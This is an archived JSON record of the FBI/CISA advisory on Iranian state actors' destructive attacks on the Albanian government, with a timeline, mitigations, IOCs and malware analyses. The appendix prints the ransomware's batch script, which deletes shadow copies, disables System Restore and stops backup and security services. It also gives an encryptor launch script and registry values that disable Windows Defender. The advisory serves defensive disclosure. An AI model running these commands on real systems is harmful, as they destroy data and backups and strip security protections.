{ "id": "d3bed73f-445b-4a2a-9b33-a5c817d14111", "created_at": "2026-04-06T01:31:16.442763Z", "updated_at": "2026-04-10T03:31:42.890861Z", "deleted_at": null, "sha1_hash": "d3da83f7607d8844044a61e4259359be1961ab6f", "title": "Iranian State Actors Conduct Cyber Operations Against the Government of Albania | CISA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 124949, "plain_text": "Iranian State Actors Conduct Cyber Operations Against the Government\r\nof Albania | CISA\r\nPublished: 2022-09-23 · Archived: 2026-04-06 00:25:23 UTC\r\nSummary\r\nThe Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing\r\nthis joint Cybersecurity Advisory to provide information on recent cyber operations against the Government of Albania in\r\nJuly and September. This advisory provides a timeline of activity observed, from initial access to execution of encryption\r\nand wiper attacks. Additional information concerning files used by the actors during their exploitation of and cyber attack\r\nagainst the victim organization is provided in Appendices A and B.\r\nIn July 2022, Iranian state cyber actors—identifying as “HomeLand Justice”—launched a destructive cyber attack against\r\nthe Government of Albania which rendered websites and services unavailable. A FBI investigation indicates Iranian state\r\ncyber actors acquired initial access to the victim’s network approximately 14 months before launching the destructive cyber\r\nattack, which included a ransomware-style file encryptor and disk wiping malware. The actors maintained continuous\r\nnetwork access for approximately a year, periodically accessing and exfiltrating e-mail content.\r\nBetween May and June 2022, Iranian state cyber actors conducted lateral movements, network reconnaissance, and\r\ncredential harvesting from Albanian government networks. In July 2022, the actors launched ransomware on the networks,\r\nleaving an anti-Mujahideen E-Khalq (MEK) message on desktops. When network defenders identified and began to respond\r\nto the ransomware activity, the cyber actors deployed a version of ZeroCleare destructive malware.\r\nIn June 2022, HomeLand Justice created a website and multiple social media profiles posting anti-MEK messages. On July\r\n18, 2022, HomeLand Justice claimed credit for the cyber attack on Albanian government infrastructure. On July 23, 2022,\r\nHomeland Justice posted videos of the cyber attack on their website. From late July to mid-August 2022, social media\r\naccounts associated with HomeLand Justice demonstrated a repeated pattern of advertising Albanian Government\r\ninformation for release, posting a poll asking respondents to select the government information to be released by HomeLand\r\nJustice, and then releasing that information—either in a .zip file or a video of a screen recording with the documents shown.\r\nIn September 2022, Iranian cyber actors launched another wave of cyber attacks against the Government of Albania, using\r\nsimilar TTPs and malware as the cyber attacks in July. These were likely done in retaliation for public attribution of the\r\ncyber attacks in July and severed diplomatic ties between Albania and Iran.\r\nDownload the PDF version of this report: pdf, 1221 kb\r\nDownload the STIX file: pdf, 44 KB\r\nTechnical Details\r\nInitial access\r\nTimeframe: Approximately 14 months before encryption and wiper attacks.\r\nDetails: Initial access was obtained via exploitation of an Internet-facing Microsoft SharePoint, exploiting CVE-2019-0604.\r\nPersistence and Lateral movement\r\nTimeframe: Approximately several days to two months after initial compromise.\r\nDetails: After obtaining access to the victim environment, the actors used several .aspx webshells, pickers.aspx ,\r\nerror4.aspx , and ClientBin.aspx , to maintain persistence. During this timeframe, the actors also used RDP (primarily),\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 1 of 12\n\nSMB, and FTP for lateral movement throughout the victim environment.\r\nExchange Server compromise\r\nTimeframe: Approximately 1-6 months after initial compromise.\r\nDetails: The actors used a compromised Microsoft Exchange account to run searches (via CmdLets New-MailboxSearch\r\nand Get-Recipient) on various mailboxes, including for administrator accounts. In this timeframe, the actors used the\r\ncompromised account to create a new Exchange account and add it to the Organization Management role group.\r\nLikely Email exfiltration\r\nTimeframe: Approximately 8 months after initial compromise.\r\nDetails: The actors made thousands of HTTP POST requests to Exchange servers of the victim organization. The FBI\r\nobserved the client transferring roughly 70-160 MB of data, and the server transferring roughly 3-20 GB of data.\r\nVPN activity\r\nTimeframe: Approximately 12-14 months after initial compromise.\r\nDetails: Approximately twelve months after initial access and two months before launching the destructive cyber attack, the\r\nactors made connections to IP addresses belonging to the victim organization’s Virtual Private Network (VPN) appliance.\r\nThe actors’ activity primarily involved two compromised accounts. The actors executed the “Advanced Port Scanner”\r\n(advanced_port_scanner.exe). The FBI also found evidence of Mimikatz usage and LSASS dumping.\r\nFile Cryptor (ransomware-style file encryptor)\r\nTimeframe: Approximately 14 months after initial compromise.\r\nDetails: For the encryption component of the cyber attack, the actor logged in to a victim organization print server via RDP\r\nand kicked off a process (Mellona.exe) which would propagate the GoXml.exe encryptor to a list of internal machines, along\r\nwith a persistence script called win.bat. As deployed, GoXML.exe encrypted all files (except those having extensions .exe,\r\n.dll, .sys, .lnk, or .lck) on the target system, leaving behind a ransom note titled How_To_Unlock_MyFiles.txt in each folder\r\nimpacted.\r\nWiper attack\r\nTimeframe: Approximately 14 months after initial compromise.\r\nDetails: In the same timeframe as the encryption attack, the actors began actions that resulted in raw disk drives being\r\nwiped with the Disk Wiper tool (cl.exe) described in Appendix A. Approximately over the next eight hours, numerous RDP\r\nconnections were logged from an identified victim server to other hosts on the victim’s network. Command line execution of\r\ncl.exe was observed in cached bitmap files from these RDP sessions on the victim server.\r\nMitigations\r\nFBI and CISA recommend organizations apply the following best practices to reduce risk of compromise: \r\nEnsure anti-virus and anti-malware software is enabled and signature definitions are updated regularly and in\r\na timely manner. Well-maintained anti-virus software may prevent use of commonly deployed cyber attacker tools\r\nthat are delivered via spear-phishing.\r\nAdopt threat reputation services at the network device, operating system, application, and email service levels.\r\nReputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses\r\nused in spear-phishing attacks.\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 2 of 12\n\nIf your organization is employing certain types of software and appliances vulnerable to known Common\r\nVulnerabilities and Exposures (CVEs), ensure those vulnerabilities are patched. Prioritize patching known\r\nexploited vulnerabilities.\r\nMonitor for unusually large amounts of data (i.e. several GB) being transferred from a Microsoft Exchange server.\r\nCheck the host-based indications, including webshells, for positive hits within your environment.\r\nMaintain and test an incident response plan.\r\nEnsure your organization has a vulnerability management program in place and that it prioritizes patch\r\nmanagement and vulnerability scanning of known exploited vulnerabilities. Note: CISA’s Cyber Hygiene Services\r\n(CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector\r\ncritical infrastructure organizations.\r\nProperly configure and secure internet-facing network devices.\r\nDo not expose management interfaces to the internet.\r\nDisable unused or unnecessary network ports and protocols.\r\nDisable/remove unused network services and devices.\r\nAdopt zero-trust principles and architecture, including:\r\nMicro-segmenting networks and functions to limit or block lateral movements.\r\nEnforcing phishing-resistant multifactor authentication (MFA) for all users and VPN connections.\r\nRestricting access to trusted devices and users on the networks.\r\nFor more information on Iranian government-sponsored malicious cyber activity, see CISA's webpage – Iran Cyber Threat\r\nOverview and Advisories.\r\nAppendix A\r\nHost-based IOCs\r\nAdditional details concerning some of these files are provided in Appendix B.\r\nFile MD5 Hash Notes\r\nError4.aspx 81e123351eb80e605ad73268a5653ff3 Webshell\r\ncl.exe 7b71764236f244ae971742ee1bc6b098 Wiper\r\nGoXML.exe bbe983dba3bf319621b447618548b740 Encryptor\r\nGoxml.jpg 0738242a521bdfe1f3ecc173f1726aa1  \r\nClientBin.aspx a9fa6cfdba41c57d8094545e9b56db36 Webshell (reverse-proxy connections)\r\nPickers.aspx 8f766dea3afd410ebcd5df5994a3c571 Webshell\r\nevaluatesiteupgrade.cs.aspx Unknown Webshell\r\nmellona.exe 78562ba0069d4235f28efd01e3f32a82 Propagation for Encryptor\r\nwin.bat 1635e1acd72809479e21b0ac5497a79b Launches GoXml.exe on startup\r\nwin.bat 18e01dee14167c1cf8a58b6a648ee049\r\nChanges desktop background to encryption\r\nimage\r\nbb.bat 59a85e8ec23ef5b5c215cd5c8e5bc2ab\r\nSaves SAM and SYSTEM hives to C:\\Temp,\r\nmakes cab archive\r\ndisable_defender.exe 60afb1e62ac61424a542b8c7b4d2cf01 Disables Windows Defender\r\nrwdsk.sys 8f6e7653807ebb57ecc549cef991d505 Raw disk driver utilized by wiper malware\r\nApp_Web_bckwssht.dll e9b6ecbf0783fa9d6981bba76d949c94  \r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 3 of 12\n\nNetwork-based IOCs\r\nFBI review of Commercial VPN service IP addresses revealed the following resolutions (per Akamai data):\r\nCountry Company\r\nAL KEMINET LTD.\r\nDE NOOP-84-247-59-0-25\r\nDE GSL NETWORKS\r\nGB LON-CLIENTS\r\nGB GB-DATACENTER\r\nNL NL-LAYERSWITCH-20190220\r\nNL PANQ-45-86-200-0\r\nUS PRIVATE CUSTOMER\r\nUS BANDITO NETWORKS\r\nUS EXTERNAL\r\nUS RU-SELENA-20080725\r\nUS TRANS OCEAN NETWORK\r\nAppendix B\r\nRansomware Cryptor\r\nGoXML.exe is a ransomware style file encryptor. It is a Windows executable, digitally signed with a certificate issued to the\r\nKuwait Telecommunications Company KSC, a subsidiary of Saudi Telecommunications Company (STC).\r\nIf executed with five or more arguments (the arguments can be anything, as long as there are five or more), the program\r\nsilently engages its file encryption functionality. Otherwise, a file-open dialog Window is presented, and any opened\r\ndocuments receive an error prompt labeled, Xml Form Builder.\r\nAll internal strings are encrypted with a hard coded RC4 key. Before internal data is decrypted, the string decryption routine\r\nhas a built-in self-test that decrypts a DWORD value and tests to see if the plaintext is the string yes . If so, it will continue\r\nto decode its internal strings.\r\nThe ransomware will attempt to launch the following batch script; however, this will fail due to a syntax error.\r\n@for /F \"skip=1\" %C in ('wmic LogicalDisk get DeviceID') do (@wmic /namespace:\\\\root\\default Path SystemRestore Call\r\ndisable \"%C\\\" \u0026 @rd /s /q %C\\$Recycle.bin)\r\n@vssadmin.exe delete shadows /all /quiet\r\n@set SrvLst=vss sql svc$ memtas mepos sophos veeam backup GxVss GxBlr GxFWD GxCVD GxCIMgr DefWatch\r\nccEvtMgr ccSetMgr SavRoam RTVscan QBFCService QBIDPService ntuit.QuickBooks.FCS QBCFMonitorService\r\nYooBackup YooIT zhudongfangyu sophos stc_raw_agent VSNAPVSS VeeamTransportSvc VeeamDeploymentService\r\nVeeamNFSSvc veeam PDVFSService BackupExecVSSProvider BackupExecAgentAccelerator BackupExecAgentBrowser\r\nBackupExecDiveciMediaService BackupExecJobEngine BackupExecManagementService BackupExecRPCService\r\nAcrSch2Svc AcronisAgent CASAD2DWebSvc CAARCUpdateSvc\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 4 of 12\n\n@for %C in (%SrvLst%) do @net stop %C\r\n@set SrvLst=\r\n@set PrcLst=mysql sql oracle ocssd dbsnmp synctime agntsvc isqlplussvc xfssvccon mydesktopservice ocautoupds encsvc\r\ntbirdconfig mydesktopqos ocomm dbeng50 sqbcoreservice excel infopath msaccess mspub onenote outlook powerpnt steam\r\nthebat thunderbird visio winword wordpad notepad\r\n@for %C in (%PrcLst%) do @taskkill /f /im \"%C.exe\"\r\n@set PrcLst=\r\n@exit\r\nThe syntax error consists of a missing backslash that separates system32 and cmd.exe , so the process is launched as\r\nsystem32cmd.exe which is an invalid command.\r\nScript Launch Bug\r\nThe ransomware’s file encryption routine will generate a random string, take the MD5 hash and use that to generate an RC4\r\n128 key which is used to encrypt files. This key is encrypted with a hard coded Public RSA key and converted to Base64\r\nutilizing a custom alphabet. This is appended to the end of the ransom note.\r\nThe cryptor places a file called How_To_Unlock_MyFiles.txt in directories with encrypted files.\r\nEach encrypted file is given the .lck extension and the contents of each file are only encrypted up to 0x100000 or\r\n1,048,576 bytes which is a hard coded limit.\r\nSeparately, the actor ran a batch script (win.bat below) to set a specific desktop background.\r\nFile Details\r\nGoXml.exe\r\nFile Size: 43.48 KB (44520 bytes)\r\nSHA256: f116acc6508843f59e59fb5a8d643370dce82f492a217764521f46a856cc4cb5\r\nSHA1: 5d117d8ef075f3f8ed1d4edcc0771a2a0886a376\r\nMD5: bbe983dba3bf319621b447618548b740\r\nSSDeep:\r\n768:+OFu8Q3w6QzfR5Jni6SQD7qSFDs6P93/q0XIc/UB5EPABWX\r\n:RFu8QAFzffJui79f13/AnB5EPAkX (Ver 1.1)\r\nFile Type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows\r\nPE Header\r\nTimestamp:\r\n2016-04-30 17:08:19\r\nImpHash: 5b2ce9270beea5915ec9adbcd0dbb070\r\nCert #0 Subject C=KW, L=Salmiya, O=Kuwait Telecommunications Company KSC, OU=Kuwait Telecommunications\r\nCompany, CN=Kuwait Telecommunications Company KSC\r\nCert #0 Issuer  C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Assured ID Code Signing CA\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 5 of 12\n\nCert #0 SHA1    55d90ec44b97b64b6dd4e3aee4d1585d6b14b26f\r\nwin.bat (#1, run malware)\r\nFile Size: 67 bytes\r\nSHA256: bad65769c0b416bb16a82b5be11f1d4788239f8b2ba77ae57948b53a69e230a6\r\nSHA1: 14b8c155e01f25e749a9726958606b242c8624b9\r\nMD5: 1635e1acd72809479e21b0ac5497a79b\r\nSSDeep: 3:LjTFKCkRErG+fyM1KDCFUF82G:r0aH1+DF82G (Ver 1.1)\r\nFile Type: ASCII text, with no line terminators\r\nContents: start /min C:\\ProgramData\\Microsoft\\Windows\\GoXml.exe 1 2 3 4 5 6 7\r\nwin.bat (#2, install desktop image)\r\nFilename: ec4cd040fd14bff86f6f6e7ba357e5bcf150c455532800edf97782836e97f6d2\r\nFile Size: 765 bytes\r\nSHA256: ec4cd040fd14bff86f6f6e7ba357e5bcf150c455532800edf97782836e97f6d2\r\nSHA1: fce0db6e66d227d3b82d4564446ede0c0fd7598c\r\nMD5: 18e01dee14167c1cf8a58b6a648ee049\r\nSSDeep:\r\n12:wbYVJ69/TsdLd6sdLd3mTDwfV+EVTCuwfV+EVTCuwfV+EVTCuwfV+EVTCuwfV\r\n+Et:wq69/kZxZ3mTDY9HY9HY9HY9HY9j (Ver 1.1)\r\nFile Type: DOS batch file text, ASCII text, with CRLF line terminators\r\nContents:\r\n@echo off\r\nsetlocal enabledelayedexpansion\r\nset \"Wtime=!time:~0,2!\"\r\nif \"!Wtime!\" leq \"20\" reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d\r\n\"c:\\programdata\\GoXml.jpg\" /f \u0026 goto done\r\nif \"!Wtime!\" geq \"20\" reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d\r\n\"c:\\programdata\\GoXml.jpg\" /f \u0026 goto done\r\n:done\r\ntimeout /t 5 \u003enul\r\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\r\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\r\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 6 of 12\n\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\r\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\r\nendlocal\r\ngoxml.jpg\r\nFile Size: 1.2 MB (1259040 bytes)\r\nSHA256: 63dd02c371e84323c4fd9a161a75e0f525423219e8a6ec1b95dd9eda182af2c9\r\nSHA1: 683eaec2b3bb5436f00b2172e287dc95e2ff2266\r\nMD5: 0738242a521bdfe1f3ecc173f1726aa1\r\nSSDeep:\r\n12288:ME0p1RE70zxntT/ylTyaaSMn2fS+0M6puxKfJbDKrCxMe5fPSC2tmx\r\nVjpJT/n37p:MHyUt7yQaaPXS6pjar+MwrjpJ7VIbZg (Ver 1.1)\r\nFile Type:\r\nJPEG image data, Exif standard: [TIFF image data, big-endian, direntries=13, height=1752, bps=0,\r\nPhotometricIntepretation=CMYK, orientation=upper-left, width=2484TIFF image data, big-endian,\r\ndirentries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, orientation=upper-left,\r\nwidth=2484], progressive, precision 8, 2484x1752, components 4\r\nSoftware: Adobe Photoshop 22.4 (Windows)\r\nModify\r\nDate:\r\n2022-07-13 20:45:20\r\nCreate\r\nDate:\r\n2020-06-11 02:13:33\r\nMetadata\r\nDate:\r\n2022-07-13 20:45:20\r\nProfile\r\nDate\r\nTime:\r\n2000-07-26 05:41:53\r\nImage\r\nSize:\r\n2484x1752\r\nFile Size: 1.2 MB (1259040 bytes)\r\nSHA256: 63dd02c371e84323c4fd9a161a75e0f525423219e8a6ec1b95dd9eda182af2c9\r\nDisk Wiper\r\nThe files cl.exe and rwdsk.sys are part of a disk wiper utility that provides raw access to the hard drive for the purposes\r\nof wiping data. From the command line the cl.exe file accepts the arguments:\r\nin\r\nun\r\nwp \u003coptional argument\u003e\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 7 of 12\n\nIf executed with the in command, the utility will output in start! and installs a hard coded file named rwdsk.sys as a\r\nservice named RawDisk3 . The .SYS file is not extracted from the installer however, but rather the installer looks for the\r\nfile in the same directory that the cl.exe is executed in. \r\nIt will also load the driver after installation.\r\nThe un command uninstalls the service, outputting the message “un start!” to the terminal.\r\nThe wp command will access the loaded driver for raw disk access.\r\nRaw Disk Access\r\nThe long hexadecimal string is hard coded in the cl.exe binary.\r\n      RawDisk3File = (void *)toOpenRawDisk3File(\r\n                               arg2_WideCharStr,\r\n                               0xC0000000,\r\n                               L\"B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D\");\r\n      ptrRawDiskFile = RawDisk3File;\r\n      if ( RawDisk3File )\r\n      {\r\n        sizeDisk = toGetDiskSize(RawDisk3File);\r\n        terminal_out(\"Total Bytez : %lld\\n\", sizeDisk \u003c\u003c 9);\r\nThe wp command also takes an additional argument as a device path to place after \\RawDisk3\\ in the output string. It is\r\nuncertain what creates this path to a device as the driver tested did not.\r\nThe output is “wp starts!” followed by the total bytes of the drive and the time the wipe operation takes.\r\nIf the registry key value HKLM\\SOFTWARE\\EldoS\\EventLog is set to “Enabled”, the install will generate an event log if at\r\nany time the install produces an error. This log contains an error code DWORD followed by the string\r\n..\\..\\DriverLibraries\\DrvSupLib\\install.c. If the system does not have the SOFTWARE\\EldoS key, no event logs would be\r\nproduced. This feature must be a related to the legitimate EldoS utility. \r\nrwdsk.sys is a “legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and\r\npartitions. The driver allows for direct modification of data on a local computer’s hard drive. In some cases, the tool can\r\nenact these raw disk modifications from user-mode processes, circumventing Windows operating system security\r\nfeatures.\"https://attack.mitre.org/software/S0364/\r\nFile Details\r\ncl.exe  \r\nFile Size 142.5 KB (145920 bytes)\r\nSHA256 e1204ebbd8f15dbf5f2e41dddc5337e3182fc4daf75b05acc948b8b965480ca0\r\nSHA1 f22a7ec80fbfdc4d8ed796119c76bfac01e0a908\r\nMD5 7b71764236f244ae971742ee1bc6b098\r\nSSDeep 3072:vv2ADi7yOcE/YMBSZ0fZX4kpK1OhJrDwM:vv2jeQ/flfZbKM (Ver 1.1)\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 8 of 12\n\nFiletype PE32+ executable (console) x86-64, for MS Windows\r\nPE Header Timestamp 2022-07-15 13:26:28\r\nImpHash 58d51c1152817ca3dec77f2eee52cbef\r\nrwdsk.sys  \r\nFile Size 38.84 KB (39776 bytes)\r\nSHA256 3c9dc8ada56adf9cebfc501a2d3946680dcb0534a137e2e27a7fcb5994cd9de6\r\nSHA1 5e061701b14faf9adec9dd0b2423ff3cfc18764b\r\nMD5 8f6e7653807ebb57ecc549cef991d505\r\nSSDeep 768:E31ySCpoCbXnfDbEaJSooKIDyE9aBazWlEAusxsia:0gyCb3MFKIHO4Ausxta (Ver 1.1)\r\nFiletype PE32+ executable (native) x86-64, for MS Windows\r\nPEtype Driver\r\nPE Header\r\nTimestamp\r\n2016-03-18 14:44:54\r\nImpHash e233f2cdc91faafe1467d9e52f166213\r\nCert #0\r\nSubject\r\nCN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US\r\nCert #0\r\nIssuer\r\nCN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US\r\nCert #0\r\nSHA1\r\n382c18388fb326221dfd7a77ee874f9ba60e04bf\r\nCert #1\r\nSubject\r\nC=US, ST=California, L=SANTA CLARA, O=NVIDIA Corporation, CN=NVIDIA Corporation\r\nCert #1\r\nIssuer\r\nC=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at\r\nhttps://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA\r\nCert #1\r\nSHA1\r\n30632ea310114105969d0bda28fdce267104754f\r\nCert #2\r\nSubject\r\nC=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. - For authorized\r\nuse only, CN=VeriSign Class 3 Public Primary Certification Authority - G5\r\nCert #2\r\nIssuer\r\nC=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Code Verification\r\nRoot\r\nCert #2\r\nSHA1\r\n57534ccc33914c41f70e2cbb2103a1db18817d8b\r\nCert #3\r\nSubject\r\nC=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at\r\nhttps://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA\r\nCert #3\r\nIssuer\r\nC=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. - For authorized\r\nuse only, CN=VeriSign Class 3 Public Primary Certification Authority - G5\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 9 of 12\n\nCert #3\r\nSHA1\r\n495847a93187cfb8c71f840cb7b41497ad95c64f\r\nAdditional Files\r\nWeb Deployed Reverse Proxy\r\nDescription\r\nClientBin.aspx is an ASP file that contains a Base64 encoded .Net executable (App_Web_bckwssht.dll) that it decodes and\r\nloads via Reflection. The .Net executable contains Class and Method obfuscation and internal strings are encoded with a\r\nsingle byte XOR obfuscation.\r\npublic static string hair_school_bracket()\r\n        {\r\n            return\r\nUmbrella_admit_arctic.rebel_sadreporthospital(\"460F2830272A2F2266052928202F21661627252D27212368\");  //Invalid\r\nConfig Package.\r\n        }\r\npublic static string Visual_math_already()\r\n        {\r\n       return Umbrella_admit_arctic.rebel_sadreporthospital(\"5304057E0116001607\");   //WV-RESET\r\nThe method rebel_sadreporthospital takes the first byte of the encoded string and XOR’s each subsequent byte to produce\r\nthe de-obfuscated string.\r\nWhen run in context of an IIS web server connecting to the ASPX file will generate a 200 \u003cEncryption DLL Info\u003e 1.5\r\noutput.\r\n \r\nInitial connection\r\nThe hex string represents the following ASCII text:\r\nBase64, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\r\nSending a POST request with a Base64 encoded IP and port will open a second socket to the supplied IP and port making\r\nthis a Web proxy. \r\nSecond Socket Opened from POST Request\r\nSending a request to WV-RESET with a value will produce an OK response and call a function to shut down the proxy\r\nsocket.\r\nTerminate socket\r\nThe DLL extracts a secondary “EncryptionDLL” named Base64.dll which is loaded via Assembly.Load. This exposes two\r\nfunctions, encrypt and decrypt. This DLL is used to decrypt the Proxy IP and port along with data. In this instance the class\r\nname is misspelled Bsae64, which is also reflected in the calling DLLs decoded strings. It is uncertain as to why an\r\nadditional Base64.dll binary is extracted when the same encoding could be hard coded in the original DLL. It is possible\r\nother versions of this tool utilize differing “EncryptionDLL” binaries.\r\n \r\nMisspelled Class Name\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 10 of 12\n\nCalled Misspelled Name\r\nFile Details\r\nClientBin.aspx  \r\nFile Size 55.24 KB (56561 bytes)\r\nSHA256 7ad64b64e0a4e510be42ba631868bbda8779139dc0daad9395ab048306cc83c5\r\nSHA1 e03edd9114e7a0138d1309034cad6b461ab0035b\r\nMD5 a9fa6cfdba41c57d8094545e9b56db36\r\nSSDeep\r\n768:x9TfK6nOgo5zE/cezUijAwZIFxK1mGjncrF8EAZ0iBDZBZdywb0DwHN4N4wjMxr8:x9TfdOgAi2\r\n(Ver 1.1)\r\nFiletype HTML document text, ASCII text, with very long lines (56458)\r\nApp_Web_bckwssht.dll  \r\nFile Size 41.0 KB (41984 bytes)\r\nSHA256 cad2bc224108142b5aa19d787c19df236b0d12c779273d05f9b0298a63dc1fe5\r\nSHA1 49fd8de33aa0ea0c7432d62f1ddca832fab25325\r\nMD5 e9b6ecbf0783fa9d6981bba76d949c94\r\nSSDeep\r\n384:coY4jnD7l9VAk1dtrGBlLGYEX1tah8dgNyamGOvMTfdYN5qZAsP:hlXAkHRGBlUUh8cFmpv6fe\r\n(Ver 1.1)\r\nFiletype PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nPEtype DLL\r\nPE Header Timestamp 2021-06-07 10:37:55\r\nImpHash dae02f32a21e03ce65412f6e56942daa\r\nDisable Defender\r\nDescription\r\ndisable_defender.exe is a Microsoft Windows PE file that attempts to disable Windows Defender. The application will\r\nelevate privileges to that of SYSTEM and then attempt to disable Defender’s core functions. A command prompt with status\r\nand error messages is displayed as the application executes. No network activity was detected during the evaluation.\r\nUpon execution, a command prompt is launched and a message is displayed if the process is not running as SYSTEM. The\r\nprocess is then restarted with the required permissions.\r\nTest validate permissions\r\nThe application will attempt to terminate the Windows Defender process by calling TerminateProcess for smartscreen.exe:\r\nAttempt to kill Windows Defender\r\nThe following Registry Keys were modified to disable Windows Defender:\r\nSet Registry Values (observed Win10 1709)  \r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 11 of 12\n\nHKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\\TamperProtection  0 \r\n   \r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\r\nDefender\\DisableAntiSpyware \r\n1 \r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\\r\nStartupApproved\\Run\\SecurityHealth \r\n03 00 00 00 5D 02 00 00 41 3B 47\r\n9D \r\nHKLM\\SOFTWARE\\Microsoft\\Windows Defender\\DisableAntiSpyware  1 \r\nHKLM\\System\\CurrentControlSet\\Services\\WinDefend\\Start  3 \r\nHKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\\r\nDisableRealtimeMonitoring \r\n1 \r\nUpon completion and if successful the application will display the following messages and wait for user input.\r\nUser Input\r\ndisable-defender.exe  \r\nFile Size 292.0 KB (299008 bytes)\r\nSHA256 45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace\r\nSHA1 e866cc6b1507f21f688ecc2ef15a64e413743da7\r\nMD5 60afb1e62ac61424a542b8c7b4d2cf01\r\nSSDeep 6144:t2WhikbJZc+Wrbe/t1zT/p03BuGJ1oh7ISCLun:t2WpZnW+/tVoJ1ouQ (Ver 1.1)\r\nFiletype PE32+ executable (console) x86-64, for MS Windows\r\nPEtype EXE\r\nPE Header Timestamp 2021-10-24 15:07:32\r\nImpHash 74a6ef9e7b49c71341e439022f643c8e\r\nRevisions\r\nSeptember 21, 2022: Initial Version|September 22, 2022: Reordered items in the Mitigation Section|September 23, 2022:\r\nAdd the STIX file\r\nSource: https://www.cisa.gov/ncas/alerts/aa22-264a\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.cisa.gov/ncas/alerts/aa22-264a" ], "report_names": [ "aa22-264a" ], "threat_actors": [ { "id": "7f25e108-e694-49b6-a494-c8458b33eb3f", "created_at": "2024-01-09T02:00:04.199217Z", "updated_at": "2026-04-10T02:00:03.509338Z", "deleted_at": null, "main_name": "HomeLand Justice", "aliases": [], "source_name": "MISPGALAXY:HomeLand Justice", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "20c759c2-cd02-45bb-85c6-41bde9e6a7cf", "created_at": "2024-01-18T02:02:34.189827Z", "updated_at": "2026-04-10T02:00:04.721082Z", "deleted_at": null, "main_name": "HomeLand Justice", "aliases": [ "Banished Kitten", "Karma", "Red Sandstorm", "Storm-0842", "Void Manticore" ], "source_name": "ETDA:HomeLand Justice", "tools": [ "BABYWIPER", "BiBi Wiper", "BiBi-Linux Wiper", "BiBi-Windows Wiper", "Cl Wiper", "LowEraser", "No-Justice Wiper", "Plink", "PuTTY Link", "RevSocks", "W2K Res Kit" ], "source_id": "ETDA", "reports": null }, { "id": "b3ebf51d-8f64-48a9-bbfb-674db872cccb", "created_at": "2025-08-07T02:03:24.769383Z", "updated_at": "2026-04-10T02:00:03.860954Z", "deleted_at": null, "main_name": "COBALT MYSTIQUE", "aliases": [ "Banished Kitten ", "DEV-0842 ", "Druidfly ", "Handala Hack Team", "Homeland Justice", "Karmabelow80", "Red Sandstorm ", "Storm-0842 ", "Void Manticore " ], "source_name": "Secureworks:COBALT MYSTIQUE", "tools": [ "AllinOneNeo", "Bibi", "GramPy", "GramPyLoader" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775439076, "ts_updated_at": 1775791902, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d3da83f7607d8844044a61e4259359be1961ab6f.pdf", "text": "https://archive.orkl.eu/d3da83f7607d8844044a61e4259359be1961ab6f.txt", "img": "https://archive.orkl.eu/d3da83f7607d8844044a61e4259359be1961ab6f.jpg" } }